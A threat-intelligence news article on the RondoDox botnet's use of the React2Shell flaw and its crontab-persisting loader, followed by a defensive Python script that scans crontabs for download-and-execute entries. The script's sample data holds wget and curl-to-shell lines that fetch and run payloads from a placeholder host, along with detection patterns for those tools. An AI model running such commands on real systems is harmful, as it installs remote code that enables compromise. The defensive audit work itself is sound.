Cybersecurity researchers have uncovered a persistent, nine-month-long campaign utilizing the recently disclosed React2Shell vulnerability to build the RondoDox botnet. This sophisticated attack has systematically targeted Internet of Things (IoT) devices and web applications, enrolling them into a growing network of compromised systems. The campaign’s evolution highlights the increasing threat posed by the exploitation of zero-day and N-day vulnerabilities.
As of December 2025, threat actors have been observed leveraging the critical React2Shell flaw (CVE-2025-55182) as a primary entry point. This vulnerability, with a CVSS score of 10.0, allows unauthenticated attackers to achieve remote code execution on susceptible devices, particularly those running React Server Components (RSC) and Next.js. The Shadowserver Foundation reported approximately 90,300 vulnerable instances globally as of December 31, 2025, with a significant concentration in the United States.
RondoDox Botnet Evolves with New Exploits
The RondoDox botnet, first detected in early 2025, has demonstrated a strategic expansion of its attack vectors. Beyond the initial exploitation of React2Shell, the campaign has incorporated other N-day security vulnerabilities, including CVE-2023-1389 and CVE-2025-24893. This multi-pronged approach suggests a well-resourced and adaptable threat actor, capable of pivoting to new exploits as they are discovered. Prominent cybersecurity firms like Darktrace, Kaspersky, and VulnCheck have previously reported on the use of React2Shell to propagate the botnet.
CloudSEK’s analysis indicates that the RondoDox campaign has progressed through distinct phases. Initially, from March to April 2025, the attackers focused on reconnaissance and manual vulnerability scanning. This was followed by a period of daily mass vulnerability probing targeting popular web applications like WordPress, Drupal, and Struts2, as well as IoT devices such as Wavlink routers, between April and June 2025. Since July, the campaign has escalated to hourly automated deployments, significantly increasing its scale and reach.
The detected malicious activity in December 2025 saw threat actors actively scanning for vulnerable Next.js servers. Upon successful compromise, they attempted to deploy cryptocurrency miners, a botnet loader and health checker, and a variant of the Mirai botnet. The botnet loader, identified by the path “/nuts/bolts,” plays a crucial role in preparing the compromised device for the main bot payload.
Botnet Loader’s Role in System Compromise
The “/nuts/bolts” component is designed to eliminate competing malware and cryptocurrency miners that may already be present on an infected device. This ensures that RondoDox has exclusive control over the system’s resources. Furthermore, it is responsible for downloading the primary bot binary from the attacker’s command-and-control (C2) server. One observed variant of this tool demonstrated advanced capabilities, including the removal of known botnets, Docker-based payloads, and residual artifacts from previous infections. It also systematically cleans up associated cron jobs and establishes persistence by modifying “/etc/crontab.”
To prevent reinfection by rival threat actors, the botnet loader continuously monitors running processes. CloudSEK reported that it actively kills non-whitelisted processes approximately every 45 seconds, effectively creating a hostile environment for other malware. This aggressive approach to maintaining control is a hallmark of sophisticated botnet operations.
Organizations are strongly advised to implement immediate mitigation strategies to counter the threat posed by RondoDox and similar evolving botnets. Updating Next.js to a patched version is paramount for protecting web applications. For IoT devices, segmenting them into dedicated VLANs can limit the blast radius of a compromise. The deployment of Web Application Firewalls (WAFs) can provide an additional layer of defense against web-based attacks.
Continuous monitoring for suspicious process execution and blocking known C2 infrastructure are essential ongoing security practices. The evolution of the RondoDox botnet, particularly its adoption of newly disclosed vulnerabilities like React2Shell, underscores the dynamic nature of cybersecurity threats. The continued efforts by threat actors to expand their botnet infrastructure suggest a sustained focus on leveraging compromised devices for malicious activities such as cryptocurrency mining and distributed denial-of-service (DDoS) attacks. Security professionals will be closely monitoring for further adaptations by the RondoDox operators and the emergence of new exploitation vectors.
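As an added example (not code from the article, from CloudSEK, or from the botnet itself), the following Python script audits system-crontab entries for the persistence pattern described above: a scheduled job that fetches content from a remote host and either drops it in a temporary directory or pipes it straight to a shell, or that references the "/nuts/bolts" loader path. The sample crontab text and the host name c2-placeholder.invalid are constructed for this example and are not indicators from the report; only the loader path and the use of /etc/crontab come from the article.

```python
"""Audit system-crontab entries for download-and-execute persistence.

Added example, not code from the article, CloudSEK or the botnet. The
crontab text and the host c2-placeholder.invalid below are constructed
samples; only the "/nuts/bolts" path and /etc/crontab come from the report.
"""
import re
from dataclasses import dataclass, field

LOADER_PATH = "/nuts/bolts"  # loader path named in the article
DOWNLOAD_TOOLS = re.compile(r"\b(curl|wget|tftp)\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(ba)?sh\b")
TEMP_DROP = re.compile(r"(/tmp|/dev/shm|/var/tmp)/\S+")


@dataclass
class Finding:
    line_no: int
    line: str
    reasons: list = field(default_factory=list)


def parse_crontab_line(line):
    """Split a system crontab entry into (schedule, user, command).

    Returns None for blank lines, comments and VAR=value assignments.
    Handles both five-field schedules and @reboot-style shortcuts.
    """
    s = line.strip()
    if not s or s.startswith("#") or re.match(r"^[A-Za-z_][A-Za-z0-9_]*=", s):
        return None
    if s.startswith("@"):
        parts = s.split(None, 2)
        return (parts[0], parts[1], parts[2]) if len(parts) == 3 else None
    parts = s.split(None, 6)
    if len(parts) < 7:
        return None
    return " ".join(parts[:5]), parts[5], parts[6]


def audit_crontab(text):
    """Return a Finding for every entry that trips one of the heuristics."""
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        parsed = parse_crontab_line(raw)
        if parsed is None:
            continue
        schedule, _user, cmd = parsed
        f = Finding(n, raw.strip())
        if LOADER_PATH in cmd:
            f.reasons.append(f"references loader path {LOADER_PATH}")
        if DOWNLOAD_TOOLS.search(cmd) and (PIPE_TO_SHELL.search(cmd) or TEMP_DROP.search(cmd)):
            f.reasons.append("downloads remote content and executes it")
        # An every-minute schedule is only worth reporting on top of another signal.
        if f.reasons and schedule == "* * * * *":
            f.reasons.append("scheduled every minute")
        if f.reasons:
            findings.append(f)
    return findings


# Constructed sample: two stock distribution entries followed by two injected ones.
SAMPLE_CRONTAB = "\n".join([
    "SHELL=/bin/sh",
    "PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin",
    "# m h dom mon dow user  command",
    "17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly",
    "25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )",
    "* * * * * root wget -q -O /tmp/.x http://c2-placeholder.invalid/nuts/bolts && sh /tmp/.x",
    "@reboot root curl -fsSL http://c2-placeholder.invalid/stage2 | sh",
])


if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB):
        print(f"line {f.line_no}: {', '.join(f.reasons)}\n    {f.line}")
```

The parser expects the system crontab format (schedule, user, command), which is shared by /etc/crontab and the files under /etc/cron.d; per-user crontabs omit the user field and would need the `parts[5]` column dropped. The heuristics are deliberately narrow so that stock entries such as run-parts are not flagged; a loader that persists by other means (an init script, a systemd unit) would not be caught here.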